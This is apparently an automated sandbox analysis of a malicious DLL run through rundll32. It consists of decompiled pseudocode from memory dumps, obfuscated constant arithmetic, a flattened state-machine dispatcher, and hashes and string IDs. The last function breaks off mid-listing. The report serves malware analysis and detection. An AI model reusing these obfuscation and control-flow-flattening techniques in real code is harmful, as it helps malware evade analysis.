                                                                      • Opcode Fuzzy Hash: 0781afec3e73dc80d09e5051321a0b1847496af7c9a5a3afd5f875a495ca2731
                                                                      • Instruction Fuzzy Hash: FD9114724083809FE359DF65C58981BFBE1BFC4758F404A0DF29696260D3BA8A59CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $ $)e$GF5$Ki$}/R4$}/R4$#$?$A$Z
                                                                      • API String ID: 0-3391024520
                                                                      • Opcode ID: 83fa3a6d39f62124582cc2ab0c530ec1acd6d0060c970106ab7acc3fc01164da
                                                                      • Instruction ID: 46f534afebe628f1ba0d4d6e89e758ecf9f991cd7a09cd4e82381cfbb582a58d
                                                                      • Opcode Fuzzy Hash: 83fa3a6d39f62124582cc2ab0c530ec1acd6d0060c970106ab7acc3fc01164da
                                                                      • Instruction Fuzzy Hash: 1D9134B2018381AFE759CF65C98980BFBE5BFC4758F50890DF19296260D3BA8959CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 96%
                                                                      			E0200B165(signed int __ecx, intOrPtr* __edx) {
                                                                      				signed int _t355;
                                                                      				void* _t362;
                                                                      				short* _t366;
                                                                      				signed int _t371;
                                                                      				signed int _t372;
                                                                      				signed int _t373;
                                                                      				signed int _t374;
                                                                      				signed int _t375;
                                                                      				signed int _t376;
                                                                      				signed int _t377;
                                                                      				short _t412;
                                                                      				void* _t415;
                                                                      				intOrPtr* _t419;
                                                                      				void* _t421;
                                                                      
                                                                      				 *(_t421 + 0x94) = 0x72b2ac;
                                                                      				 *(_t421 + 0x98) = 0x3313a1;
                                                                      				_t412 = 0;
                                                                      				 *(_t421 + 0xa0) = __ecx;
                                                                      				 *((intOrPtr*)(_t421 + 0xac)) = 0;
                                                                      				_t419 = __edx;
                                                                      				 *(_t421 + 0x28) = 0x912c;
                                                                      				 *(_t421 + 0x28) =  *(_t421 + 0x28) | 0x96fb441e;
                                                                      				_t415 = 0x7c0af2;
                                                                      				_t371 = 0x53;
                                                                      				 *(_t421 + 0x2c) =  *(_t421 + 0x28) / _t371;
                                                                      				_t372 = 0x54;
                                                                      				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) / _t372;
                                                                      				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) ^ 0x00058b38;
                                                                      				 *(_t421 + 0x5c) = 0xc013;
                                                                      				 *(_t421 + 0x5c) =  *(_t421 + 0x5c) | 0xaee1eb4d;
                                                                      				_t373 = 0x12;
                                                                      				 *(_t421 + 0x58) =  *(_t421 + 0x5c) * 0x6b;
                                                                      				 *(_t421 + 0x58) =  *(_t421 + 0x58) ^ 0x186d60a5;
                                                                      				 *(_t421 + 0x3c) = 0xace2;
                                                                      				 *(_t421 + 0x3c) =  *(_t421 + 0x3c) << 6;
                                                                      				 *(_t421 + 0x3c) =  *(_t421 + 0x3c) + 0x7229;
                                                                      				 *(_t421 + 0x3c) =  *(_t421 + 0x3c) ^ 0x402baaa9;
                                                                      				 *(_t421 + 0x14) = 0xebdd;
                                                                      				 *(_t421 + 0x14) =  *(_t421 + 0x14) >> 0xe;
                                                                      				 *(_t421 + 0x14) =  *(_t421 + 0x14) * 6;
                                                                      				 *(_t421 + 0x14) =  *(_t421 + 0x14) + 0xffffac6e;
                                                                      				 *(_t421 + 0x14) =  *(_t421 + 0x14) ^ 0xffff9658;
                                                                      				 *(_t421 + 0x7c) = 0xde69;
                                                                      				 *(_t421 + 0x7c) =  *(_t421 + 0x7c) * 0x6f;
                                                                      				 *(_t421 + 0x7c) =  *(_t421 + 0x7c) ^ 0x006039f6;
                                                                      				 *(_t421 + 0x6c) = 0x3341;
                                                                      				 *(_t421 + 0x6c) =  *(_t421 + 0x6c) / _t373;
                                                                      				 *(_t421 + 0x6c) =  *(_t421 + 0x6c) * 0x2e;
                                                                      				 *(_t421 + 0x6c) =  *(_t421 + 0x6c) ^ 0x0000be9a;
                                                                      				 *(_t421 + 0x1c) = 0xbddd;
                                                                      				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) * 0x3d;
                                                                      				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) >> 8;
                                                                      				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) + 0x3ffb;
                                                                      				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) ^ 0x000052ea;
                                                                      				 *(_t421 + 0x24) = 0xcd1f;
                                                                      				 *(_t421 + 0x24) =  *(_t421 + 0x24) >> 0xa;
                                                                      				 *(_t421 + 0x24) =  *(_t421 + 0x24) + 0xc8ca;
                                                                      				 *(_t421 + 0x24) =  *(_t421 + 0x24) + 0xffff7446;
                                                                      				 *(_t421 + 0x24) =  *(_t421 + 0x24) ^ 0x00001184;
                                                                      				 *(_t421 + 0x68) = 0xd1f6;
                                                                      				 *(_t421 + 0x68) =  *(_t421 + 0x68) ^ 0x7d0ee771;
                                                                      				 *(_t421 + 0x68) =  *(_t421 + 0x68) | 0x146ba192;
                                                                      				 *(_t421 + 0x68) =  *(_t421 + 0x68) ^ 0x7d6fd061;
                                                                      				 *(_t421 + 0x2c) = 0x301e;
                                                                      				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) * 0x69;
                                                                      				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) + 0xffff2f7e;
                                                                      				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) + 0x7add;
                                                                      				 *(_t421 + 0x2c) =  *(_t421 + 0x2c) ^ 0x00135481;
                                                                      				 *(_t421 + 0x70) = 0x1444;
                                                                      				 *(_t421 + 0x70) =  *(_t421 + 0x70) << 9;
                                                                      				 *(_t421 + 0x70) =  *(_t421 + 0x70) * 0x58;
                                                                      				 *(_t421 + 0x70) =  *(_t421 + 0x70) ^ 0x0deed291;
                                                                      				 *(_t421 + 0x40) = 0xdbcb;
                                                                      				 *(_t421 + 0x40) =  *(_t421 + 0x40) << 2;
                                                                      				 *(_t421 + 0x40) =  *(_t421 + 0x40) + 0x85c1;
                                                                      				 *(_t421 + 0x40) =  *(_t421 + 0x40) ^ 0x0003ec2c;
                                                                      				 *(_t421 + 0x20) = 0xfb14;
                                                                      				 *(_t421 + 0x20) =  *(_t421 + 0x20) >> 0xf;
                                                                      				 *(_t421 + 0x20) =  *(_t421 + 0x20) + 0xffffe5e4;
                                                                      				 *(_t421 + 0x20) =  *(_t421 + 0x20) ^ 0x8e096c3b;
                                                                      				 *(_t421 + 0x20) =  *(_t421 + 0x20) ^ 0x71f69dd9;
                                                                      				 *(_t421 + 0x78) = 0xa667;
                                                                      				 *(_t421 + 0x78) =  *(_t421 + 0x78) << 9;
                                                                      				_t374 = 0x4b;
                                                                      				 *(_t421 + 0x7c) =  *(_t421 + 0x78) * 0x23;
                                                                      				 *(_t421 + 0x7c) =  *(_t421 + 0x7c) ^ 0x2d804cb7;
                                                                      				 *(_t421 + 0x4c) = 0x24eb;
                                                                      				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) + 0xffff8a60;
                                                                      				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) + 0x432e;
                                                                      				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) ^ 0xffffdfad;
                                                                      				 *(_t421 + 0x1c) = 0x8ff7;
                                                                      				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) + 0xffff7e20;
                                                                      				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) + 0x6b1c;
                                                                      				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) | 0xe81a6241;
                                                                      				 *(_t421 + 0x1c) =  *(_t421 + 0x1c) ^ 0xe81a424f;
                                                                      				 *(_t421 + 0xa0) = 0x8ec2;
                                                                      				 *(_t421 + 0xa0) =  *(_t421 + 0xa0) * 0x28;
                                                                      				 *(_t421 + 0xa0) =  *(_t421 + 0xa0) ^ 0x001611ad;
                                                                      				 *(_t421 + 0x58) = 0x8fa;
                                                                      				 *(_t421 + 0x58) =  *(_t421 + 0x58) ^ 0x94aafe32;
                                                                      				 *(_t421 + 0x58) =  *(_t421 + 0x58) | 0x50621cea;
                                                                      				 *(_t421 + 0x58) =  *(_t421 + 0x58) ^ 0xd4eaf643;
                                                                      				 *(_t421 + 0x68) = 0x3e9e;
                                                                      				 *(_t421 + 0x68) =  *(_t421 + 0x68) / _t374;
                                                                      				 *(_t421 + 0x68) =  *(_t421 + 0x68) + 0x4fd4;
                                                                      				 *(_t421 + 0x68) =  *(_t421 + 0x68) ^ 0x000029dc;
                                                                      				 *(_t421 + 0x94) = 0x99a7;
                                                                      				 *(_t421 + 0x94) =  *(_t421 + 0x94) >> 4;
                                                                      				 *(_t421 + 0x94) =  *(_t421 + 0x94) ^ 0x00007b7a;
                                                                      				 *(_t421 + 0x38) = 0x83e0;
                                                                      				 *(_t421 + 0x38) =  *(_t421 + 0x38) >> 0xb;
                                                                      				 *(_t421 + 0x38) =  *(_t421 + 0x38) << 9;
                                                                      				 *(_t421 + 0x38) =  *(_t421 + 0x38) ^ 0x00004453;
                                                                      				 *(_t421 + 0x60) = 0xe6f7;
                                                                      				 *(_t421 + 0x60) =  *(_t421 + 0x60) | 0x7af10f83;
                                                                      				 *(_t421 + 0x60) =  *(_t421 + 0x60) << 3;
                                                                      				 *(_t421 + 0x60) =  *(_t421 + 0x60) ^ 0xd78f39d0;
                                                                      				 *(_t421 + 0x78) = 0x97e9;
                                                                      				 *(_t421 + 0x78) =  *(_t421 + 0x78) + 0x9235;
                                                                      				_t375 = 0xe;
                                                                      				 *(_t421 + 0x74) =  *(_t421 + 0x78) / _t375;
                                                                      				 *(_t421 + 0x74) =  *(_t421 + 0x74) ^ 0x000018b2;
                                                                      				 *(_t421 + 0x30) = 0xd59f;
                                                                      				 *(_t421 + 0x30) =  *(_t421 + 0x30) << 7;
                                                                      				 *(_t421 + 0x30) =  *(_t421 + 0x30) << 7;
                                                                      				 *(_t421 + 0x30) =  *(_t421 + 0x30) << 0xa;
                                                                      				 *(_t421 + 0x30) =  *(_t421 + 0x30) ^ 0x9f00725b;
                                                                      				 *(_t421 + 0x38) = 0xa6ba;
                                                                      				 *(_t421 + 0x38) =  *(_t421 + 0x38) << 0x10;
                                                                      				 *(_t421 + 0x38) =  *(_t421 + 0x38) >> 0xc;
                                                                      				 *(_t421 + 0x38) =  *(_t421 + 0x38) ^ 0x000a754c;
                                                                      				 *(_t421 + 0x60) = 0x53a7;
                                                                      				 *(_t421 + 0x60) =  *(_t421 + 0x60) << 3;
                                                                      				 *(_t421 + 0x60) =  *(_t421 + 0x60) + 0x2bc6;
                                                                      				 *(_t421 + 0x60) =  *(_t421 + 0x60) ^ 0x0002e6e9;
                                                                      				 *(_t421 + 0x50) = 0x9b50;
                                                                      				 *(_t421 + 0x50) =  *(_t421 + 0x50) >> 5;
                                                                      				 *(_t421 + 0x50) =  *(_t421 + 0x50) >> 0xe;
                                                                      				 *(_t421 + 0x50) =  *(_t421 + 0x50) ^ 0x00007f5d;
                                                                      				 *(_t421 + 0x4c) = 0x566e;
                                                                      				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) + 0x42f2;
                                                                      				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) + 0x9896;
                                                                      				 *(_t421 + 0x4c) =  *(_t421 + 0x4c) ^ 0x00014aa9;
                                                                      				 *(_t421 + 0x94) = 0x126;
                                                                      				 *(_t421 + 0x94) =  *(_t421 + 0x94) + 0xffffea10;
                                                                      				 *(_t421 + 0x94) =  *(_t421 + 0x94) ^ 0xffffa88e;
                                                                      				 *(_t421 + 0x88) = 0x5486;
                                                                      				_t376 = 0x51;
                                                                      				 *(_t421 + 0x8c) =  *(_t421 + 0x88) / _t376;
                                                                      				 *(_t421 + 0x8c) =  *(_t421 + 0x8c) ^ 0x00007ea1;
                                                                      				 *(_t421 + 0x14) = 0x191d;
                                                                      				 *(_t421 + 0x14) =  *(_t421 + 0x14) + 0x9b5;
                                                                      				 *(_t421 + 0x14) =  *(_t421 + 0x14) >> 5;
                                                                      				_t377 = 6;
                                                                      				_t368 =  *(_t421 + 0xa0);
                                                                      				 *(_t421 + 0x10) =  *(_t421 + 0x14) / _t377;
                                                                      				 *(_t421 + 0x10) =  *(_t421 + 0x10) ^ 0x0000160b;
                                                                      				 *(_t421 + 0x98) = 0x6a77;
                                                                      				 *(_t421 + 0x98) =  *(_t421 + 0x98) ^ 0x34a50dbd;
                                                                      				 *(_t421 + 0x98) =  *(_t421 + 0x98) ^ 0x34a50f69;
                                                                      				 *(_t421 + 0x44) = 0x7616;
                                                                      				 *(_t421 + 0x44) =  *(_t421 + 0x44) + 0xffff0287;
                                                                      				 *(_t421 + 0x44) =  *(_t421 + 0x44) + 0xffff9d7b;
                                                                      				 *(_t421 + 0x44) =  *(_t421 + 0x44) ^ 0xffff183e;
                                                                      				 *(_t421 + 0x8c) = 0xc1dc;
                                                                      				 *(_t421 + 0x8c) =  *(_t421 + 0x8c) + 0x7d7c;
                                                                      				 *(_t421 + 0x8c) =  *(_t421 + 0x8c) ^ 0x00013d0b;
                                                                      				 *(_t421 + 0x84) = 0xc54;
                                                                      				 *(_t421 + 0x84) =  *(_t421 + 0x84) >> 7;
                                                                      				 *(_t421 + 0x84) =  *(_t421 + 0x84) ^ 0x0000610f;
                                                                      				 *(_t421 + 0x80) = 0xb84f;
                                                                      				 *(_t421 + 0x80) =  *(_t421 + 0x80) | 0xe7d082ca;
                                                                      				 *(_t421 + 0x80) =  *(_t421 + 0x80) ^ 0xe7d0dc6c;
                                                                      				do {
                                                                      					while(_t415 != 0x7c0af2) {
                                                                      						if(_t415 == 0x131e8aac) {
                                                                      							_push(_t377);
                                                                      							_t377 = 0;
                                                                      							_t355 = E0200C0C8(0,  *((intOrPtr*)(_t421 + 0x64)),  *((intOrPtr*)(_t421 + 0x54)),  *((intOrPtr*)(_t421 + 0x4e8)),  *((intOrPtr*)(_t421 + 0x54)),  *(_t421 + 0x78),  *(_t421 + 0x6c),  *(_t421 + 0x60), 0,  *(_t421 + 0x30),  *(_t421 + 0x50));
                                                                      							_t368 = _t355;
                                                                      							_t421 = _t421 + 0x28;
                                                                      							__eflags = _t355 - 0xffffffff;
                                                                      							if(__eflags != 0) {
                                                                      								_t415 = 0x17f63d9e;
                                                                      								continue;
                                                                      							}
                                                                      						} else {
                                                                      							if(_t415 == 0x1531e410) {
                                                                      								_push( *((intOrPtr*)(_t421 + 0x4c4)));
                                                                      								_push( *(_t421 + 0x1c));
                                                                      								_push( *(_t421 + 0x50));
                                                                      								E0200BAEC(0x104, __eflags,  *(_t421 + 0x7c), E01FF5DFC( *(_t421 + 0x2c),  *(_t421 + 0x84), __eflags), _t421 + 0x2cc,  *(_t421 + 0x80),  *((intOrPtr*)(_t421 + 0xa8)),  *((intOrPtr*)(_t421 + 0x4dc)),  *((intOrPtr*)(_t421 + 0xb0)), _t421 + 0xbc);
                                                                      								_t377 =  *(_t421 + 0x68);
                                                                      								E02000D6D(_t377,  *((intOrPtr*)(_t421 + 0x90)),  *((intOrPtr*)(_t421 + 0xa4)), _t357);
                                                                      								_t421 = _t421 + 0x34;
                                                                      								_t415 = 0x131e8aac;
                                                                      								continue;
                                                                      							} else {
                                                                      								if(_t415 == 0x17f63d9e) {
                                                                      									_t298 = _t419 + 4; // 0xffff2ff9
                                                                      									_t362 = E020069AC( *((intOrPtr*)(_t421 + 0xac)), _t298,  *_t419,  *((intOrPtr*)(_t421 + 0x9c)),  *(_t421 + 0x20), _t368,  *(_t421 + 0xa0), _t377,  *_t298);
                                                                      									_t421 = _t421 + 0x1c;
                                                                      									_t377 = 1;
                                                                      									_t415 = 0x1a33388b;
                                                                      									__eflags = _t362;
                                                                      									_t412 =  !=  ? 1 : _t412;
                                                                      									continue;
                                                                      								} else {
                                                                      									if(_t415 == 0x1a33388b) {
                                                                      										E01FFF1ED( *(_t421 + 0x50),  *(_t421 + 0x98),  *(_t421 + 0x8c),  *(_t421 + 0x84), _t368);
                                                                      									} else {
                                                                      										if(_t415 == 0x2700e9a0) {
                                                                      											E02002631( *((intOrPtr*)(_t421 + 0x34)), _t421 + 0x2bc, __eflags,  *(_t421 + 0x74),  *(_t421 + 0x40));
                                                                      											_pop(_t377);
                                                                      											_t415 = 0x1531e410;
                                                                      											continue;
                                                                      										} else {
                                                                      											_t430 = _t415 - 0x287e9283;
                                                                      											if(_t415 != 0x287e9283) {
                                                                      												goto L15;
                                                                      											} else {
                                                                      												_push(_t377);
                                                                      												E01FFDFD8( *(_t421 + 0x20), _t421 + 0xb8, _t430,  *(_t421 + 0x84),  *(_t421 + 0x70));
                                                                      												_t366 = E01FFBDCC(_t421 + 0xc0,  *(_t421 + 0x30),  *((intOrPtr*)(_t421 + 0x34)),  *(_t421 + 0x74));
                                                                      												_t421 = _t421 + 0x14;
                                                                      												_t415 = 0x2700e9a0;
                                                                      												_t377 = 0;
                                                                      												 *_t366 = 0;
                                                                      												continue;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						L18:
                                                                      						return _t412;
                                                                      					}
                                                                      					_t415 = 0x287e9283;
                                                                      					L15:
                                                                      					__eflags = _t415 - 0x2b84612a;
                                                                      				} while (__eflags != 0);
                                                                      				goto L18;
                                                                      			}

















                                                                      0x0200b4d0
                                                                      0x0200b4d8
                                                                      0x0200b4e0
                                                                      0x0200b4e5
                                                                      0x0200b4ea
                                                                      0x0200b4f2
                                                                      0x0200b4fa
                                                                      0x0200b4ff
                                                                      0x0200b507
                                                                      0x0200b50f
                                                                      0x0200b517
                                                                      0x0200b51c
                                                                      0x0200b521
                                                                      0x0200b529
                                                                      0x0200b531
                                                                      0x0200b539
                                                                      0x0200b541
                                                                      0x0200b549
                                                                      0x0200b556
                                                                      0x0200b561
                                                                      0x0200b56c
                                                                      0x0200b580
                                                                      0x0200b585
                                                                      0x0200b58e
                                                                      0x0200b599
                                                                      0x0200b5a1
                                                                      0x0200b5a9
                                                                      0x0200b5b2
                                                                      0x0200b5b5
                                                                      0x0200b5bc
                                                                      0x0200b5c0
                                                                      0x0200b5c8
                                                                      0x0200b5d3
                                                                      0x0200b5de
                                                                      0x0200b5e9
                                                                      0x0200b5f1
                                                                      0x0200b5f9
                                                                      0x0200b601
                                                                      0x0200b609
                                                                      0x0200b614
                                                                      0x0200b61f
                                                                      0x0200b62a
                                                                      0x0200b635
                                                                      0x0200b63d
                                                                      0x0200b648
                                                                      0x0200b653
                                                                      0x0200b65e
                                                                      0x0200b669
                                                                      0x0200b669
                                                                      0x0200b67b
                                                                      0x0200b7e8
                                                                      0x0200b7f6
                                                                      0x0200b813
                                                                      0x0200b818
                                                                      0x0200b81a
                                                                      0x0200b81d
                                                                      0x0200b820
                                                                      0x0200b822
                                                                      0x00000000
                                                                      0x0200b822
                                                                      0x0200b681
                                                                      0x0200b687
                                                                      0x0200b760
                                                                      0x0200b767
                                                                      0x0200b76b
                                                                      0x0200b7be
                                                                      0x0200b7d2
                                                                      0x0200b7d6
                                                                      0x0200b7db
                                                                      0x0200b7de
                                                                      0x00000000
                                                                      0x0200b68d
                                                                      0x0200b693
                                                                      0x0200b723
                                                                      0x0200b746
                                                                      0x0200b74d
                                                                      0x0200b750
                                                                      0x0200b751
                                                                      0x0200b756
                                                                      0x0200b758
                                                                      0x00000000
                                                                      0x0200b699
                                                                      0x0200b69f
                                                                      0x0200b859
                                                                      0x0200b6a5
                                                                      0x0200b6ab
                                                                      0x0200b712
                                                                      0x0200b718
                                                                      0x0200b719
                                                                      0x00000000
                                                                      0x0200b6ad
                                                                      0x0200b6ad
                                                                      0x0200b6b3
                                                                      0x00000000
                                                                      0x0200b6b9
                                                                      0x0200b6b9
                                                                      0x0200b6d0
                                                                      0x0200b6e8
                                                                      0x0200b6ed
                                                                      0x0200b6f0
                                                                      0x0200b6f5
                                                                      0x0200b6f7
                                                                      0x00000000
                                                                      0x0200b6f7
                                                                      0x0200b6b3
                                                                      0x0200b6ab
                                                                      0x0200b69f
                                                                      0x0200b693
                                                                      0x0200b687
                                                                      0x0200b861
                                                                      0x0200b86d
                                                                      0x0200b86d
                                                                      0x0200b82c
                                                                      0x0200b831
                                                                      0x0200b831
                                                                      0x0200b831
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )r$A3$Lu$[r$nV$wj$z{$|}$R
                                                                      • API String ID: 0-850793479
                                                                      • Opcode ID: d0681bbcf1d8c2ae31e0750e38afae1e1e02a7d62d883bf6dc7be4e0de3dd199
                                                                      • Instruction ID: ad41b5683b246d2f347ec9c328f3f3fce15c3b1d07f433e9157fc25044e258ad
                                                                      • Opcode Fuzzy Hash: d0681bbcf1d8c2ae31e0750e38afae1e1e02a7d62d883bf6dc7be4e0de3dd199
                                                                      • Instruction Fuzzy Hash: 09F103715087819FE368CF61C489A4BFBE1BBC4318F10891DF5E9962A0D7B98949DF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )r$A3$Lu$[r$nV$wj$z{$|}$R
                                                                      • API String ID: 0-850793479
                                                                      • Opcode ID: 6e6897a998e18687a9f3c11353b0d64c9edf89887ff37091b059f781d74057a9
                                                                      • Instruction ID: 7af94299c310d750ed1bd799885e2f2491869191c0decd1db032d01098cca52f
                                                                      • Opcode Fuzzy Hash: 6e6897a998e18687a9f3c11353b0d64c9edf89887ff37091b059f781d74057a9
                                                                      • Instruction Fuzzy Hash: 15F1F1715087819FE368CF21C48AA4BFBE1BBC4318F10891DF5E9962A0D7B58959CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 98%
                                                                      			E02008C2B() {
                                                                      				char _v520;
                                                                      				short _v524;
                                                                      				short _v528;
                                                                      				intOrPtr _v532;
                                                                      				intOrPtr _v536;
                                                                      				char _v540;
                                                                      				intOrPtr* _v544;
                                                                      				intOrPtr _v548;
                                                                      				signed int _v552;
                                                                      				signed int _v556;
                                                                      				signed int _v560;
                                                                      				signed int _v564;
                                                                      				signed int _v568;
                                                                      				signed int _v572;
                                                                      				signed int _v576;
                                                                      				signed int _v580;
                                                                      				signed int _v584;
                                                                      				signed int _v588;
                                                                      				signed int _v592;
                                                                      				signed int _v596;
                                                                      				signed int _v600;
                                                                      				signed int _v604;
                                                                      				signed int _v608;
                                                                      				signed int _v612;
                                                                      				signed int _v616;
                                                                      				signed int _v620;
                                                                      				signed int _v624;
                                                                      				signed int _v628;
                                                                      				signed int _v632;
                                                                      				signed int _v636;
                                                                      				signed int _v640;
                                                                      				signed int _v644;
                                                                      				signed int _v648;
                                                                      				signed int _v652;
                                                                      				signed int _v656;
                                                                      				signed int _v660;
                                                                      				signed int _v664;
                                                                      				signed int _v668;
                                                                      				signed int _v672;
                                                                      				signed int _v676;
                                                                      				signed int _v680;
                                                                      				void* _t300;
                                                                      				intOrPtr _t302;
                                                                      				short _t306;
                                                                      				short _t308;
                                                                      				short _t309;
                                                                      				intOrPtr _t312;
                                                                      				void* _t317;
                                                                      				intOrPtr* _t349;
                                                                      				signed int _t350;
                                                                      				signed int _t351;
                                                                      				signed int _t352;
                                                                      				intOrPtr _t353;
                                                                      				intOrPtr* _t354;
                                                                      				short _t355;
                                                                      				signed int* _t357;
                                                                      
                                                                      				_t357 =  &_v680;
                                                                      				_v536 = 0x205681;
                                                                      				_v532 = 0x662dd;
                                                                      				_t317 = 0x1e086586;
                                                                      				_t355 = 0;
                                                                      				_v528 = 0;
                                                                      				_v524 = 0;
                                                                      				_v652 = 0xf058;
                                                                      				_t350 = 0x3f;
                                                                      				_v652 = _v652 / _t350;
                                                                      				_v652 = _v652 ^ 0xf52b0b85;
                                                                      				_v652 = _v652 ^ 0x1b04eaa7;
                                                                      				_v652 = _v652 ^ 0xee2fe2f3;
                                                                      				_v604 = 0x95c0;
                                                                      				_v604 = _v604 | 0x84eb5d1b;
                                                                      				_v604 = _v604 ^ 0x37b71fa3;
                                                                      				_v604 = _v604 ^ 0xb35cc279;
                                                                      				_v632 = 0xdad5;
                                                                      				_v632 = _v632 >> 1;
                                                                      				_v632 = _v632 | 0x6db5f9e1;
                                                                      				_v632 = _v632 ^ 0x6db5e788;
                                                                      				_v616 = 0xf7c4;
                                                                      				_v616 = _v616 + 0xffffc625;
                                                                      				_v616 = _v616 + 0x83c2;
                                                                      				_v616 = _v616 ^ 0x000171e4;
                                                                      				_v620 = 0xd68a;
                                                                      				_v620 = _v620 ^ 0xd8043047;
                                                                      				_v620 = _v620 + 0xb99d;
                                                                      				_v620 = _v620 ^ 0xd805aeb2;
                                                                      				_v600 = 0xba3e;
                                                                      				_v600 = _v600 + 0xffff4aed;
                                                                      				_v600 = _v600 ^ 0xbcc6d77f;
                                                                      				_v600 = _v600 ^ 0xbcc6d5de;
                                                                      				_v676 = 0x731e;
                                                                      				_v676 = _v676 ^ 0x5ee95724;
                                                                      				_v676 = _v676 << 1;
                                                                      				_v676 = _v676 ^ 0x578f8622;
                                                                      				_v676 = _v676 ^ 0xea5dba2f;
                                                                      				_v564 = 0xdb79;
                                                                      				_v564 = _v564 + 0xffff5324;
                                                                      				_v564 = _v564 ^ 0x000059e2;
                                                                      				_v656 = 0x318b;
                                                                      				_v656 = _v656 * 0x75;
                                                                      				_v656 = _v656 | 0xae3833e5;
                                                                      				_v656 = _v656 ^ 0x79d8626c;
                                                                      				_v656 = _v656 ^ 0xd7e6dd07;
                                                                      				_v612 = 0xd72f;
                                                                      				_v612 = _v612 | 0xacf7f151;
                                                                      				_v612 = _v612 << 0x10;
                                                                      				_v612 = _v612 ^ 0xf77f2cdc;
                                                                      				_v588 = 0x6e25;
                                                                      				_v588 = _v588 | 0xb635d493;
                                                                      				_v588 = _v588 ^ 0xb635a7f6;
                                                                      				_v664 = 0x854b;
                                                                      				_v664 = _v664 >> 2;
                                                                      				_v664 = _v664 + 0xffff5540;
                                                                      				_v664 = _v664 + 0xffff815d;
                                                                      				_v664 = _v664 ^ 0xfffeba3d;
                                                                      				_v628 = 0x2397;
                                                                      				_v628 = _v628 ^ 0xd486bf36;
                                                                      				_v628 = _v628 * 0x57;
                                                                      				_v628 = _v628 ^ 0x39bf10ef;
                                                                      				_v592 = 0x332f;
                                                                      				_v592 = _v592 << 0xf;
                                                                      				_v592 = _v592 ^ 0x1997d067;
                                                                      				_v584 = 0x9daa;
                                                                      				_v584 = _v584 ^ 0xc1827730;
                                                                      				_v584 = _v584 ^ 0xc182cb74;
                                                                      				_v552 = 0xead9;
                                                                      				_v552 = _v552 << 0x10;
                                                                      				_v552 = _v552 ^ 0xead93b3b;
                                                                      				_v568 = 0x955d;
                                                                      				_v568 = _v568 >> 4;
                                                                      				_v568 = _v568 ^ 0x00001627;
                                                                      				_v668 = 0x4c8;
                                                                      				_v668 = _v668 << 5;
                                                                      				_v668 = _v668 + 0xabe4;
                                                                      				_v668 = _v668 | 0x24ffa7bc;
                                                                      				_v668 = _v668 ^ 0x24fff134;
                                                                      				_v608 = 0xf88a;
                                                                      				_v608 = _v608 ^ 0x49fbfdea;
                                                                      				_v608 = _v608 << 5;
                                                                      				_v608 = _v608 ^ 0x3f60b2d9;
                                                                      				_v660 = 0xc005;
                                                                      				_v660 = _v660 << 0xa;
                                                                      				_v660 = _v660 ^ 0xddadac51;
                                                                      				_v660 = _v660 | 0xebc284be;
                                                                      				_v660 = _v660 ^ 0xffefbdbf;
                                                                      				_v560 = 0xaa76;
                                                                      				_v560 = _v560 >> 0xa;
                                                                      				_v560 = _v560 ^ 0x0000145f;
                                                                      				_v680 = 0x11f3;
                                                                      				_v680 = _v680 >> 0x10;
                                                                      				_v680 = _v680 + 0x9fae;
                                                                      				_v680 = _v680 + 0xffffa8e8;
                                                                      				_v680 = _v680 ^ 0x000040be;
                                                                      				_v556 = 0x5f3c;
                                                                      				_v556 = _v556 << 0xd;
                                                                      				_v556 = _v556 ^ 0x0be7cdfb;
                                                                      				_v640 = 0x303f;
                                                                      				_v640 = _v640 | 0xdf49b5a6;
                                                                      				_v640 = _v640 + 0xffffa103;
                                                                      				_v640 = _v640 ^ 0xdf496290;
                                                                      				_v636 = 0xc44a;
                                                                      				_v636 = _v636 << 9;
                                                                      				_t351 = 0x24;
                                                                      				_v636 = _v636 / _t351;
                                                                      				_v636 = _v636 ^ 0x000ae4ba;
                                                                      				_v672 = 0xae3b;
                                                                      				_v672 = _v672 | 0xebb53fed;
                                                                      				_v672 = _v672 << 0xa;
                                                                      				_v672 = _v672 ^ 0xd6fff3bd;
                                                                      				_v576 = 0x604f;
                                                                      				_v576 = _v576 + 0x4aad;
                                                                      				_v576 = _v576 ^ 0x0000811b;
